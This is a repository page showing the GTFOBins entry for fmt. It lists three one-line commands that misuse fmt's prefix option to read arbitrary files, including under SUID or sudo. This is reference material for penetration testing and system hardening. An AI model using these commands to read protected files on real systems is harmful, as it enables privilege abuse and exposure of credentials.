This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
732e4f9ae47f75428ebe0b28e4858e00f2248da1
GTFOBins.github.io
/
_gtfobins
/
fmt.md
Emilio Pinna
dd337b5ddf
Adopt new function names
2018-10-05 18:55:38 +01:00
362 B
Raw
Blame
History
description, functions
description
functions
The read file content is not binary-safe.
file-read
suid
sudo
code
LFILE=file_to_read fmt -pNON_EXISTING_PREFIX "$LFILE"
code
LFILE=file_to_read ./fmt -pNON_EXISTING_PREFIX "$LFILE"
code
LFILE=file_to_read sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
Reference in New Issue
View Git Blame
Copy Permalink